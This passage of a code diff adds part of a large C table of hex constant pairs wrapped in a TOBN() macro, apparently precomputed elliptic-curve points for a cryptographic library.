+     TOBN(0x988906a1, 0x65cf7b10), TOBN(0x81b67178, 0xc50d8485),
+     TOBN(0x7c0deb35, 0x8a35b3de), TOBN(0x423ac855, 0xc1d29799),
+     TOBN(0xaf580d87, 0xdac50b74), TOBN(0x28b2b89f, 0x5869734c),
+     TOBN(0x99a3b936, 0x874e28fb), TOBN(0xbb2c9190, 0x25f3f73a),
+     TOBN(0x199f6918, 0x84a9d5b7), TOBN(0x7ebe2325, 0x7e770374),
+     TOBN(0xf442e107, 0x0738efe2), TOBN(0xcf9f3f56, 0xcf9082d2),
+     TOBN(0x719f69e1, 0x09618708), TOBN(0xcc9e8364, 0xc183f9b1),
+     TOBN(0xec203a95, 0x366a21af), TOBN(0x6aec5d6d, 0x068b141f),
+     TOBN(0xee2df78a, 0x994f04e9), TOBN(0xb39ccae8, 0x271245b0),
+     TOBN(0xb875a4a9, 0x97e43f4f), TOBN(0x507dfe11, 0xdb2cea98),
+     TOBN(0x4fbf81cb, 0x489b03e9), TOBN(0xdb86ec5b, 0x6ec414fa),
+     TOBN(0xfad444f9, 0xf51b3ae5), TOBN(0xca7d33d6, 0x1914e3fe),
+     TOBN(0xa9c32f5c, 0x0ae6c4d0), TOBN(0xa9ca1d1e, 0x73969568),
+     TOBN(0x98043c31, 0x1aa7467e), TOBN(0xe832e75c, 0xe21b5ac6),
+     TOBN(0x314b7aea, 0x5232123d), TOBN(0x08307c8c, 0x65ae86db),
+     TOBN(0x06e7165c, 0xaa4668ed), TOBN(0xb170458b, 0xb4d3ec39),
+     TOBN(0x4d2e3ec6, 0xc19bb986), TOBN(0xc5f34846, 0xae0304ed),
+     TOBN(0x917695a0, 0x6c9f9722), TOBN(0x6c7f7317, 0x4cab1c0a),
+     TOBN(0x6295940e, 0x9d6d2e8b), TOBN(0xd318b8c1, 0x549f7c97),
+     TOBN(0x22453204, 0x97713885), TOBN(0x468d834b, 0xa8a440fe),
+     TOBN(0xd81fe5b2, 0xbfba796e), TOBN(0x152364db, 0x6d71f116),
+     TOBN(0xbb8c7c59, 0xb5b66e53), TOBN(0x0b12c61b, 0x2641a192),
+     TOBN(0x31f14802, 0xfcf0a7fd), TOBN(0x42fd0789, 0x5488b01e),
+     TOBN(0x71d78d6d, 0x9952b498), TOBN(0x8eb572d9, 0x07ac5201),
+     TOBN(0xe0a2a44c, 0x4d194a88), TOBN(0xd2b63fd9, 0xba017e66),
+     TOBN(0x78efc6c8, 0xf888aefc), TOBN(0xb76f6bda, 0x4a881a11),
+     TOBN(0x187f314b, 0xb46c2397), TOBN(0x004cf566, 0x5ded2819),
+     TOBN(0xa9ea5704, 0x38764d34), TOBN(0xbba45217, 0x78084709),
+     TOBN(0x06474571, 0x1171121e), TOBN(0xad7b7eb1, 0xe7c9b671),
+     TOBN(0xdacfbc40, 0x730f7507), TOBN(0x178cd8c6, 0xc7ad7bd1),
+     TOBN(0xbf0be101, 0xb2a67238), TOBN(0x3556d367, 0xaf9c14f2),
+     TOBN(0x104b7831, 0xa5662075), TOBN(0x58ca59bb, 0x79d9e60a),
+     TOBN(0x4bc45392, 0xa569a73b), TOBN(0x517a52e8, 0x5698f6c9),
+     TOBN(0x85643da5, 0xaeadd755), TOBN(0x1aed0cd5, 0x2a581b84),
+     TOBN(0xb9b4ff84, 0x80af1372), TOBN(0x244c3113, 0xf1ba5d1f),
+     TOBN(0x2a5dacbe, 0xf5f98d31), TOBN(0x2c3323e8, 0x4375bc2a),
+     TOBN(0x17a3ab4a, 0x5594b1dd), TOBN(0xa1928bfb, 0xceb4797e),
+     TOBN(0xe83af245, 0xe4886a19), TOBN(0x8979d546, 0x72b5a74a),
+     TOBN(0xa0f726bc, 0x19f9e967), TOBN(0xd9d03152, 0xe8fbbf4e),
+     TOBN(0xcfd6f51d, 0xb7707d40), TOBN(0x633084d9, 0x63f6e6e0),
+     TOBN(0xedcd9cdc, 0x55667eaf), TOBN(0x73b7f92b, 0x2e44d56f),
+     TOBN(0xfb2e39b6, 0x4e962b14), TOBN(0x7d408f6e, 0xf671fcbf),
+     TOBN(0xcc634ddc, 0x164a89bb), TOBN(0x74a42bb2, 0x3ef3bd05),
+     TOBN(0x1280dbb2, 0x428decbb), TOBN(0x6103f6bb, 0x402c8596),
+     TOBN(0xfa2bf581, 0x355a5752), TOBN(0x562f96a8, 0x00946674),
+     TOBN(0x4e4ca16d, 0x6da0223b), TOBN(0xfe47819f, 0x28d3aa25),
+     TOBN(0x9eea3075, 0xf8dfcf8a), TOBN(0xa284f0aa, 0x95669825),
+     TOBN(0xb3fca250, 0x867d3fd8), TOBN(0x20757b5f, 0x269d691e),
+     TOBN(0xf2c24020, 0x93b8a5de), TOBN(0xd3f93359, 0xebc06da6),
+     TOBN(0x1178293e, 0xb2739c33), TOBN(0xd2a3e770, 0xbcd686e5),
+     TOBN(0xa76f49f4, 0xcd941534), TOBN(0x0d37406b, 0xe3c71c0e),
+     TOBN(0x172d9397, 0x3b97f7e3), TOBN(0xec17e239, 0xbd7fd0de),
+     TOBN(0xe3290551, 0x6f496ba2), TOBN(0x6a693172, 0x36ad50e7),
+     TOBN(0xc4e539a2, 0x83e7eff5), TOBN(0x752737e7, 0x18e1b4cf),
+     TOBN(0xa2f7932c, 0x68af43ee), TOBN(0x5502468e, 0x703d00bd),
+     TOBN(0xe5dc978f, 0x2fb061f5), TOBN(0xc9a1904a, 0x28c815ad),
+     TOBN(0xd3af538d, 0x470c56a4), TOBN(0x159abc5f, 0x193d8ced),
+     TOBN(0x2a37245f, 0x20108ef3), TOBN(0xfa17081e, 0x223f7178),
+     TOBN(0x27b0fb2b, 0x10c8c0f5), TOBN(0x2102c3ea, 0x40650547),
+     TOBN(0x594564df, 0x8ac3bfa7), TOBN(0x98102033, 0x509dad96),
+     TOBN(0x6989643f, 0xf1d18a13), TOBN(0x35eebd91, 0xd7fc5af0),
+     TOBN(0x078d096a, 0xfaeaafd8), TOBN(0xb7a89341, 0xdef3de98),
+     TOBN(0x2a206e8d, 0xecf2a73a), TOBN(0x066a6397, 0x8e551994),
+     TOBN(0x3a6a088a, 0xb98d53a2), TOBN(0x0ce7c67c, 0x2d1124aa),
+     TOBN(0x48cec671, 0x759a113c), TOBN(0xe3b373d3, 0x4f6f67fa),
+     TOBN(0x5455d479, 0xfd36727b), TOBN(0xe5a428ee, 0xa13c0d81),
+     TOBN(0xb853dbc8, 0x1c86682b), TOBN(0xb78d2727, 0xb8d02b2a),
+     TOBN(0xaaf69bed, 0x8ebc329a), TOBN(0xdb6b40b3, 0x293b2148),
+     TOBN(0xe42ea77d, 0xb8c4961f), TOBN(0xb1a12f7c, 0x20e5e0ab),
+     TOBN(0xa0ec5274, 0x79e8b05e), TOBN(0x68027391, 0xfab60a80),
+     TOBN(0x6bfeea5f, 0x16b1bd5e), TOBN(0xf957e420, 0x4de30ad3),
+     TOBN(0xcbaf664e, 0x6a353b9e), TOBN(0x5c873312, 0x26d14feb),
+     TOBN(0x4e87f98c, 0xb65f57cb), TOBN(0xdb60a621, 0x5e0cdd41),
+     TOBN(0x67c16865, 0xa6881440), TOBN(0x1093ef1a, 0x46ab52aa),
+     TOBN(0xc095afb5, 0x3f4ece64), TOBN(0x6a6bb02e, 0x7604551a),
+     TOBN(0x55d44b4e, 0x0b26b8cd), TOBN(0xe5f9a999, 0xf971268a),
+     TOBN(0xc08ec425, 0x11a7de84), TOBN(0x83568095, 0xfda469dd),
+     TOBN(0x737bfba1, 0x6c6c90a2), TOBN(0x1cb9c4a0, 0xbe229831),
+     TOBN(0x93bccbba, 0xbb2eec64), TOBN(0xa0c23b64, 0xda03adbe),
+     TOBN(0x5f7aa00a, 0xe0e86ac4), TOBN(0x470b941e, 0xfc1401e6),
+     TOBN(0x5ad8d679, 0x9df43574), TOBN(0x4ccfb8a9, 0x0f65d810),
+     TOBN(0x1bce80e3, 0xaa7fbd81), TOBN(0x273291ad, 0x9508d20a),
+     TOBN(0xf5c4b46b, 0x42a92806), TOBN(0x810684ec, 0xa86ab44a),
+     TOBN(0x4591640b, 0xca0bc9f8), TOBN(0xb5efcdfc, 0x5c4b6054),
+     TOBN(0x16fc8907, 0x6e9edd12), TOBN(0xe29d0b50, 0xd4d792f9),
+     TOBN(0xa45fd01c, 0x9b03116d), TOBN(0x85035235, 0xc81765a4),
+     TOBN(0x1fe2a9b2, 0xb4b4b67c), TOBN(0xc1d10df0, 0xe8020604),
+     TOBN(0x9d64abfc, 0xbc8058d8), TOBN(0x8943b9b2, 0x712a0fbb),
+     TOBN(0x90eed914, 0x3b3def04), TOBN(0x85ab3aa2, 0x4ce775ff),
+     TOBN(0x605fd4ca, 0x7bbc9040), TOBN(0x8b34a564, 0xe2c75dfb),
+     TOBN(0x41ffc94a, 0x10358560), TOBN(0x2d8a5072, 0x9e5c28aa),
+     TOBN(0xe915a0fc, 0x4cc7eb15), TOBN(0xe9efab05, 0x8f6d0f5d),
+     TOBN(0xdbab47a9, 0xd19e9b91), TOBN(0x8cfed745, 0x0276154c),
+     TOBN(0x154357ae, 0x2cfede0d), TOBN(0x520630df, 0x19f5a4ef),
+     TOBN(0x25759f7c, 0xe382360f), TOBN(0xb6db05c9, 0x88bf5857),
+     TOBN(0x2917d61d, 0x6c58d46c), TOBN(0x14f8e491, 0xfd20cb7a),
+     TOBN(0xb68a727a, 0x11c20340), TOBN(0x0386f86f, 0xaf7ccbb6),
+     TOBN(0x5c8bc6cc, 0xfee09a20), TOBN(0x7d76ff4a, 0xbb7eea35),
+     TOBN(0xa7bdebe7, 0xdb15be7a), TOBN(0x67a08054, 0xd89f0302),
+     TOBN(0x56bf0ea9, 0xc1193364), TOBN(0xc8244467, 0x62837ebe),
+     TOBN(0x32bd8e8b, 0x20d841b8), TOBN(0x127a0548, 0xdbb8a54f),
+     TOBN(0x83dd4ca6, 0x63b20236), TOBN(0x87714718, 0x203491fa),
+     TOBN(0x4dabcaaa, 0xaa8a5288), TOBN(0x91cc0c8a, 0xaf23a1c9),
+     TOBN(0x34c72c6a, 0x3f220e0c), TOBN(0xbcc20bdf, 0x1232144a),
+     TOBN(0x6e2f42da, 0xa20ede1b), TOBN(0xc441f00c, 0x74a00515),
+     TOBN(0xbf46a5b6, 0x734b8c4b), TOBN(0x57409503, 0x7b56c9a4),
+     TOBN(0x9f735261, 0xe4585d45), TOBN(0x9231faed, 0x6734e642),
+     TOBN(0x1158a176, 0xbe70ee6c), TOBN(0x35f1068d, 0x7c3501bf),
+     TOBN(0x6beef900, 0xa2d26115), TOBN(0x649406f2, 0xef0afee3),
+     TOBN(0x3f43a60a, 0xbc2420a1), TOBN(0x509002a7, 0xd5aee4ac),
+     TOBN(0xb46836a5, 0x3ff3571b), TOBN(0x24f98b78, 0x837927c1),
+     TOBN(0x6254256a, 0x4533c716), TOBN(0xf27abb0b, 0xd07ee196),
+     TOBN(0xd7cf64fc, 0x5c6d5bfd), TOBN(0x6915c751, 0xf0cd7a77),
+     TOBN(0xd9f59012, 0x8798f534), TOBN(0x772b0da8, 0xf81d8b5f),
+     TOBN(0x1244260c, 0x2e03fa69), TOBN(0x36cf0e3a, 0x3be1a374),
+     TOBN(0x6e7c1633, 0xef06b960), TOBN(0xa71a4c55, 0x671f90f6),
+     TOBN(0x7a941251, 0x33c673db), TOBN(0xc0bea510, 0x73e8c131),
+     TOBN(0x61a8a699, 0xd4f6c734), TOBN(0x25e78c88, 0x341ed001),
+     TOBN(0x5c18acf8, 0x8e2f7d90), TOBN(0xfdbf33d7, 0x77be32cd),
+     TOBN(0x0a085cd7, 0xd2eb5ee9), TOBN(0x2d702cfb, 0xb3201115),
+     TOBN(0xb6e0ebdb, 0x85c88ce8), TOBN(0x23a3ce3c, 0x1e01d617),
+     TOBN(0x3041618e, 0x567333ac), TOBN(0x9dd0fd8f, 0x157edb6b),
+     TOBN(0x27f74702, 0xb57872b8), TOBN(0x2ef26b4f, 0x657d5fe1),
+     TOBN(0x95426f0a, 0x57cf3d40), TOBN(0x847e2ad1, 0x65a6067a),
+     TOBN(0xd474d9a0, 0x09996a74), TOBN(0x16a56acd, 0x2a26115c),
+     TOBN(0x02a615c3, 0xd16f4d43), TOBN(0xcc3fc965, 0xaadb85b7),
+     TOBN(0x386bda73, 0xce07d1b0), TOBN(0xd82910c2, 0x58ad4178),
+     TOBN(0x124f82cf, 0xcd2617f4), TOBN(0xcc2f5e8d, 0xef691770),
+     TOBN(0x82702550, 0xb8c30ccc), TOBN(0x7b856aea, 0x1a8e575a),
+     TOBN(0xbb822fef, 0xb1ab9459), TOBN(0x085928bc, 0xec24e38e),
+     TOBN(0x5d0402ec, 0xba8f4b4d), TOBN(0xc07cd4ba, 0x00b4d58b),
+     TOBN(0x5d8dffd5, 0x29227e7a), TOBN(0x61d44d0c, 0x31bf386f),
+     TOBN(0xe486dc2b, 0x135e6f4d), TOBN(0x680962eb, 0xe79410ef),
+     TOBN(0xa61bd343, 0xf10088b5), TOBN(0x6aa76076, 0xe2e28686),
+     TOBN(0x80463d11, 0x8fb98871), TOBN(0xcb26f5c3, 0xbbc76aff),
+     TOBN(0xd4ab8edd, 0xfbe03614), TOBN(0xc8eb579b, 0xc0cf2dee),
+     TOBN(0xcc004c15, 0xc93bae41), TOBN(0x46fbae5d, 0x3aeca3b2),
+     TOBN(0x671235cf, 0x0f1e9ab1), TOBN(0xadfba934, 0x9ec285c1),
+     TOBN(0x88ded013, 0xf216c980), TOBN(0xc8ac4fb8, 0xf79e0bc1),
+     TOBN(0xa29b89c6, 0xfb97a237), TOBN(0xb697b780, 0x9922d8e7),
+     TOBN(0x3142c639, 0xddb945b5), TOBN(0x447b06c7, 0xe094c3a9),
+     TOBN(0xcdcb3642, 0x72266c90), TOBN(0x633aad08, 0xa9385046),
+     TOBN(0xa36c936b, 0xb57c6477), TOBN(0x871f8b64, 0xe94dbcc6),
+     TOBN(0x28d0fb62, 0xa591a67b), TOBN(0x9d40e081, 0xc1d926f5),
+     TOBN(0x3111eaf6, 0xf2d84b5a), TOBN(0x228993f9, 0xa565b644),
+     TOBN(0x0ccbf592, 0x2c83188b), TOBN(0xf87b30ab, 0x3df3e197),
+     TOBN(0xb8658b31, 0x7642bca8), TOBN(0x1a032d7f, 0x52800f17),
+     TOBN(0x051dcae5, 0x79bf9445), TOBN(0xeba6b8ee, 0x54a2e253),
+     TOBN(0x5c8b9cad, 0xd4485692), TOBN(0x84bda40e, 0x8986e9be),
+     TOBN(0xd16d16a4, 0x2f0db448), TOBN(0x8ec80050, 0xa14d4188),
+     TOBN(0xb2b26107, 0x98fa7aaa), TOBN(0x41209ee4, 0xf073aa4e),
+     TOBN(0xf1570359, 0xf2d6b19b), TOBN(0xcbe6868c, 0xfc577caf),
+     TOBN(0x186c4bdc, 0x32c04dd3), TOBN(0xa6c35fae, 0xcfeee397),
+     TOBN(0xb4a1b312, 0xf086c0cf), TOBN(0xe0a5ccc6, 0xd9461fe2),
+     TOBN(0xc32278aa, 0x1536189f), TOBN(0x1126c55f, 0xba6df571),
+     TOBN(0x0f71a602, 0xb194560e), TOBN(0x8b2d7405, 0x324bd6e1),
+     TOBN(0x8481939e, 0x3738be71), TOBN(0xb5090b1a, 0x1a4d97a9),
+     TOBN(0x116c65a3, 0xf05ba915), TOBN(0x21863ad3, 0xaae448aa),
+     TOBN(0xd24e2679, 0xa7aae5d3), TOBN(0x7076013d, 0x0de5c1c4),
+     TOBN(0x2d50f8ba, 0xbb05b629), TOBN(0x73c1abe2, 0x6e66efbb),
+     TOBN(0xefd4b422, 0xf2488af7), TOBN(0xe4105d02, 0x663ba575),
+     TOBN(0x7eb60a8b, 0x53a69457), TOBN(0x62210008, 0xc945973b),
+     TOBN(0xfb255478, 0x77a50ec6), TOBN(0xbf0392f7, 0x0a37a72c),
+     TOBN(0xa0a7a19c, 0x4be18e7a), TOBN(0x90d8ea16, 0x25b1e0af),
+     TOBN(0x7582a293, 0xef953f57), TOBN(0x90a64d05, 0xbdc5465a),
+     TOBN(0xca79c497, 0xe2510717), TOBN(0x560dbb7c, 0x18cb641f),
+     TOBN(0x1d8e3286, 0x4b66abfb), TOBN(0xd26f52e5, 0x59030900),
+     TOBN(0x1ee3f643, 0x5584941a), TOBN(0x6d3b3730, 0x569f5958),
+     TOBN(0x9ff2a62f, 0x4789dba5), TOBN(0x91fcb815, 0x72b5c9b7),
+     TOBN(0xf446cb7d, 0x6c8f9a0e), TOBN(0x48f625c1, 0x39b7ecb5),
+     TOBN(0xbabae801, 0x1c6219b8), TOBN(0xe7a562d9, 0x28ac2f23),
+     TOBN(0xe1b48732, 0x26e20588), TOBN(0x06ee1cad, 0x775af051),
+     TOBN(0xda29ae43, 0xfaff79f7), TOBN(0xc141a412, 0x652ee9e0),
+     TOBN(0x1e127f6f, 0x195f4bd0), TOBN(0x29c6ab4f, 0x072f34f8),
+     TOBN(0x7b7c1477, 0x30448112), TOBN(0x82b51af1, 0xe4a38656),
+     TOBN(0x2bf2028a, 0x2f315010), TOBN(0xc9a4a01f, 0x6ea88cd4),
+     TOBN(0xf63e95d8, 0x257e5818), TOBN(0xdd8efa10, 0xb4519b16),
+     TOBN(0xed8973e0, 0x0da910bf), TOBN(0xed49d077, 0x5c0fe4a9),
+     TOBN(0xac3aac5e, 0xb7caee1e), TOBN(0x1033898d, 0xa7f4da57),
+     TOBN(0x42145c0e, 0x5c6669b9), TOBN(0x42daa688, 0xc1aa2aa0),
+     TOBN(0x629cc15c, 0x1a1d885a), TOBN(0x25572ec0, 0xf4b76817),
+     TOBN(0x8312e435, 0x9c8f8f28), TOBN(0x8107f8cd, 0x81965490),
+     TOBN(0x516ff3a3, 0x6fa6110c), TOBN(0x74fb1eb1, 0xfb93561f),
+     TOBN(0x6c0c9047, 0x8457522b), TOBN(0xcfd32104, 0x6bb8bdc6),
+     TOBN(0x2d6884a2, 0xcc80ad57), TOBN(0x7c27fc35, 0x86a9b637),
+     TOBN(0x3461baed, 0xadf4e8cd), TOBN(0x1d56251a, 0x617242f0),
+     TOBN(0x0b80d209, 0xc955bef4), TOBN(0xdf02cad2, 0x06adb047),
+     TOBN(0xf0d7cb91, 0x5ec74fee), TOBN(0xd2503375, 0x1111ba44),
+     TOBN(0x9671755e, 0xdf53cb36), TOBN(0x54dcb612, 0x3368551b),
+     TOBN(0x66d69aac, 0xc8a025a4), TOBN(0x6be946c6, 0xe77ef445),
+     TOBN(0x719946d1, 0xa995e094), TOBN(0x65e848f6, 0xe51e04d8),
+     TOBN(0xe62f3300, 0x6a1e3113), TOBN(0x1541c7c1, 0x501de503),
+     TOBN(0x4daac9fa, 0xf4acfade), TOBN(0x0e585897, 0x44cd0b71),
+     TOBN(0x544fd869, 0x0a51cd77), TOBN(0x60fc20ed, 0x0031016d),
+     TOBN(0x58b404ec, 0xa4276867), TOBN(0x46f6c3cc, 0x34f34993),
+     TOBN(0x477ca007, 0xc636e5bd), TOBN(0x8018f5e5, 0x7c458b47),
+     TOBN(0xa1202270, 0xe47b668f), TOBN(0xcef48ccd, 0xee14f203),
+     TOBN(0x23f98bae, 0x62ff9b4d), TOBN(0x55acc035, 0xc589eddd),
+     TOBN(0x3fe712af, 0x64db4444), TOBN(0x19e9d634, 0xbecdd480),
+     TOBN(0xe08bc047, 0xa930978a), TOBN(0x2dbf24ec, 0xa1280733),
+     TOBN(0x3c0ae38c, 0x2cd706b2), TOBN(0x5b012a5b, 0x359017b9),
+     TOBN(0x3943c38c, 0x72e0f5ae), TOBN(0x786167ea, 0x57176fa3),
+     TOBN(0xe5f9897d, 0x594881dc), TOBN(0x6b5efad8, 0xcfb820c1),
+     TOBN(0xb2179093, 0xd55018de), TOBN(0x39ad7d32, 0x0bac56ce),
+     TOBN(0xb55122e0, 0x2cfc0e81), TOBN(0x117c4661, 0xf6d89daa),
+     TOBN(0x362d01e1, 0xcb64fa09), TOBN(0x6a309b4e, 0x3e9c4ddd),
+     TOBN(0xfa979fb7, 0xabea49b1), TOBN(0xb4b1d27d, 0x10e2c6c5),
+     TOBN(0xbd61c2c4, 0x23afde7a), TOBN(0xeb6614f8, 0x9786d358),
+     TOBN(0x4a5d816b, 0x7f6f7459), TOBN(0xe431a44f, 0x09360e7b),
+     TOBN(0x8c27a032, 0xc309914c), TOBN(0xcea5d68a, 0xcaede3d8),
+     TOBN(0x3668f665, 0x3a0a3f95), TOBN(0x89369416, 0x7ceba27b),
+     TOBN(0x89981fad, 0xe4728fe9), TOBN(0x7102c8a0, 0x8a093562),
+     TOBN(0xbb80310e, 0x235d21c8), TOBN(0x505e55d1, 0xbefb7f7b),
+     TOBN(0xa0a90811, 0x12958a67), TOBN(0xd67e106a, 0x4d851fef),
+     TOBN(0xb84011a9, 0x431dd80e), TOBN(0xeb7c7cca, 0x73306cd9),
+     TOBN(0x20fadd29, 0xd1b3b730), TOBN(0x83858b5b, 0xfe37b3d3),
+     TOBN(0xbf4cd193, 0xb6251d5c), TOBN(0x1cca1fd3, 0x1352d952),
+     TOBN(0xc66157a4, 0x90fbc051), TOBN(0x7990a638, 0x89b98636),}
+    ,
+    {TOBN(0xe5aa692a, 0x87dec0e1), TOBN(0x010ded8d, 0xf7b39d00),
+     TOBN(0x7b1b80c8, 0x54cfa0b5), TOBN(0x66beb876, 0xa0f8ea28),
+     TOBN(0x50d7f531, 0x3476cd0e), TOBN(0xa63d0e65, 0xb08d3949),
+     TOBN(0x1a09eea9, 0x53479fc6), TOBN(0x82ae9891, 0xf499e742),
+     TOBN(0xab58b910, 0x5ca7d866), TOBN(0x582967e2, 0x3adb3b34),
+     TOBN(0x89ae4447, 0xcceac0bc), TOBN(0x919c667c, 0x7bf56af5),
+     TOBN(0x9aec17b1, 0x60f5dcd7), TOBN(0xec697b9f, 0xddcaadbc),
+     TOBN(0x0b98f341, 0x463467f5), TOBN(0xb187f1f7, 0xa967132f),
+     TOBN(0x90fe7a1d, 0x214aeb18), TOBN(0x1506af3c, 0x741432f7),
+     TOBN(0xbb5565f9, 0xe591a0c4), TOBN(0x10d41a77, 0xb44f1bc3),
+     TOBN(0xa09d65e4, 0xa84bde96), TOBN(0x42f060d8, 0xf20a6a1c),
+     TOBN(0x652a3bfd, 0xf27f9ce7), TOBN(0xb6bdb65c, 0x3b3d739f),
+     TOBN(0xeb5ddcb6, 0xec7fae9f), TOBN(0x995f2714, 0xefb66e5a),
+     TOBN(0xdee95d8e, 0x69445d52), TOBN(0x1b6c2d46, 0x09e27620),
+     TOBN(0x32621c31, 0x8129d716), TOBN(0xb03909f1, 0x0958c1aa),
+     TOBN(0x8c468ef9, 0x1af4af63), TOBN(0x162c429f, 0xfba5cdf6),
+     TOBN(0x2f682343, 0x753b9371), TOBN(0x29cab45a, 0x5f1f9cd7),
+     TOBN(0x571623ab, 0xb245db96), TOBN(0xc507db09, 0x3fd79999),
+     TOBN(0x4e2ef652, 0xaf036c32), TOBN(0x86f0cc78, 0x05018e5c),
+     TOBN(0xc10a73d4, 0xab8be350), TOBN(0x6519b397, 0x7e826327),
+     TOBN(0xe8cb5eef, 0x9c053df7), TOBN(0x8de25b37, 0xb300ea6f),
+     TOBN(0xdb03fa92, 0xc849cffb), TOBN(0x242e43a7, 0xe84169bb),
+     TOBN(0xe4fa51f4, 0xdd6f958e), TOBN(0x6925a77f, 0xf4445a8d),
+     TOBN(0xe6e72a50, 0xe90d8949), TOBN(0xc66648e3, 0x2b1f6390),
+     TOBN(0xb2ab1957, 0x173e460c), TOBN(0x1bbbce75, 0x30704590),
+     TOBN(0xc0a90dbd, 0xdb1c7162), TOBN(0x505e399e, 0x15cdd65d),
+     TOBN(0x68434dcb, 0x57797ab7), TOBN(0x60ad35ba, 0x6a2ca8e8),
+     TOBN(0x4bfdb1e0, 0xde3336c1), TOBN(0xbbef99eb, 0xd8b39015),
+     TOBN(0x6c3b96f3, 0x1711ebec), TOBN(0x2da40f1f, 0xce98fdc4),
+     TOBN(0xb99774d3, 0x57b4411f), TOBN(0x87c8bdf4, 0x15b65bb6),
+     TOBN(0xda3a89e3, 0xc2eef12d), TOBN(0xde95bb9b, 0x3c7471f3),
+     TOBN(0x600f225b, 0xd812c594), TOBN(0x54907c5d, 0x2b75a56b),
+     TOBN(0xa93cc5f0, 0x8db60e35), TOBN(0x743e3cd6, 0xfa833319),
+     TOBN(0x7dad5c41, 0xf81683c9), TOBN(0x70c1e7d9, 0x9c34107e),
+     TOBN(0x0edc4a39, 0xa6be0907), TOBN(0x36d47035, 0x86d0b7d3),
+     TOBN(0x8c76da03, 0x272bfa60), TOBN(0x0b4a07ea, 0x0f08a414),
+     TOBN(0x699e4d29, 0x45c1dd53), TOBN(0xcadc5898, 0x231debb5),
+     TOBN(0xdf49fcc7, 0xa77f00e0), TOBN(0x93057bbf, 0xa73e5a0e),
+     TOBN(0x2f8b7ecd, 0x027a4cd1), TOBN(0x114734b3, 0xc614011a),
+     TOBN(0xe7a01db7, 0x67677c68), TOBN(0x89d9be5e, 0x7e273f4f),
+     TOBN(0xd225cb2e, 0x089808ef), TOBN(0xf1f7a27d, 0xd59e4107),
+     TOBN(0x53afc761, 0x8211b9c9), TOBN(0x0361bc67, 0xe6819159),
+     TOBN(0x2a865d0b, 0x7f071426), TOBN(0x6a3c1810, 0xe7072567),
+     TOBN(0x3e3bca1e, 0x0d6bcabd), TOBN(0xa1b02bc1, 0x408591bc),
+     TOBN(0xe0deee59, 0x31fba239), TOBN(0xf47424d3, 0x98bd91d1),
+     TOBN(0x0f8886f4, 0x071a3c1d), TOBN(0x3f7d41e8, 0xa819233b),
+     TOBN(0x708623c2, 0xcf6eb998), TOBN(0x86bb49af, 0x609a287f),
+     TOBN(0x942bb249, 0x63c90762), TOBN(0x0ef6eea5, 0x55a9654b),
+     TOBN(0x5f6d2d72, 0x36f5defe), TOBN(0xfa9922dc, 0x56f99176),
+     TOBN(0x6c8c5ece, 0xf78ce0c7), TOBN(0x7b44589d, 0xbe09b55e),
+     TOBN(0xe11b3bca, 0x9ea83770), TOBN(0xd7fa2c7f, 0x2ab71547),
+     TOBN(0x2a3dd6fa, 0x2a1ddcc0), TOBN(0x09acb430, 0x5a7b7707),
+     TOBN(0x4add4a2e, 0x649d4e57), TOBN(0xcd53a2b0, 0x1917526e),
+     TOBN(0xc5262330, 0x20b44ac4), TOBN(0x4028746a, 0xbaa2c31d),
+     TOBN(0x51318390, 0x64291d4c), TOBN(0xbf48f151, 0xee5ad909),
+     TOBN(0xcce57f59, 0x7b185681), TOBN(0x7c3ac1b0, 0x4854d442),
+     TOBN(0x65587dc3, 0xc093c171), TOBN(0xae7acb24, 0x24f42b65),
+     TOBN(0x5a338adb, 0x955996cb), TOBN(0xc8e65675, 0x6051f91b),
+     TOBN(0x66711fba, 0x28b8d0b1), TOBN(0x15d74137, 0xb6c10a90),
+     TOBN(0x70cdd7eb, 0x3a232a80), TOBN(0xc9e2f07f, 0x6191ed24),
+     TOBN(0xa80d1db6, 0xf79588c0), TOBN(0xfa52fc69, 0xb55768cc),
+     TOBN(0x0b4df1ae, 0x7f54438a), TOBN(0x0cadd1a7, 0xf9b46a4f),
+     TOBN(0xb40ea6b3, 0x1803dd6f), TOBN(0x488e4fa5, 0x55eaae35),
+     TOBN(0x9f047d55, 0x382e4e16), TOBN(0xc9b5b7e0, 0x2f6e0c98),
+     TOBN(0x6b1bd2d3, 0x95762649), TOBN(0xa9604ee7, 0xc7aea3f6),
+     TOBN(0x3646ff27, 0x6dc6f896), TOBN(0x9bf0e7f5, 0x2860bad1),
+     TOBN(0x2d92c821, 0x7cb44b92), TOBN(0xa2f5ce63, 0xaea9c182),
+     TOBN(0xd0a2afb1, 0x9154a5fd), TOBN(0x482e474c, 0x95801da6),
+     TOBN(0xc19972d0, 0xb611c24b), TOBN(0x1d468e65, 0x60a8f351),
+     TOBN(0xeb758069, 0x7bcf6421), TOBN(0xec9dd0ee, 0x88fbc491),
+     TOBN(0x5b59d2bf, 0x956c2e32), TOBN(0x73dc6864, 0xdcddf94e),
+     TOBN(0xfd5e2321, 0xbcee7665), TOBN(0xa7b4f8ef, 0x5e9a06c4),
+     TOBN(0xfba918dd, 0x7280f855), TOBN(0xbbaac260, 0x8baec688),
+     TOBN(0xa3b3f00f, 0x33400f42), TOBN(0x3d2dba29, 0x66f2e6e4),
+     TOBN(0xb6f71a94, 0x98509375), TOBN(0x8f33031f, 0xcea423cc),
+     TOBN(0x009b8dd0, 0x4807e6fb), TOBN(0x5163cfe5, 0x5cdb954c),
+     TOBN(0x03cc8f17, 0xcf41c6e8), TOBN(0xf1f03c2a, 0x037b925c),
+     TOBN(0xc39c19cc, 0x66d2427c), TOBN(0x823d24ba, 0x7b6c18e4),
+     TOBN(0x32ef9013, 0x901f0b4f), TOBN(0x684360f1, 0xf8941c2e),
+     TOBN(0x0ebaff52, 0x2c28092e), TOBN(0x7891e4e3, 0x256c932f),
+     TOBN(0x51264319, 0xac445e3d), TOBN(0x553432e7, 0x8ea74381),
+     TOBN(0xe6eeaa69, 0x67e9c50a), TOBN(0x27ced284, 0x62e628c7),
+     TOBN(0x3f96d375, 0x7a4afa57), TOBN(0xde0a14c3, 0xe484c150),
+     TOBN(0x364a24eb, 0x38bd9923), TOBN(0x1df18da0, 0xe5177422),
+     TOBN(0x174e8f82, 0xd8d38a9b), TOBN(0x2e97c600, 0xe7de1391),
+     TOBN(0xc5709850, 0xa1c175dd), TOBN(0x969041a0, 0x32ae5035),
+     TOBN(0xcbfd533b, 0x76a2086b), TOBN(0xd6bba71b, 0xd7c2e8fe),
+     TOBN(0xb2d58ee6, 0x099dfb67), TOBN(0x3a8b342d, 0x064a85d9),
+     TOBN(0x3bc07649, 0x522f9be3), TOBN(0x690c075b, 0xdf1f49a8),
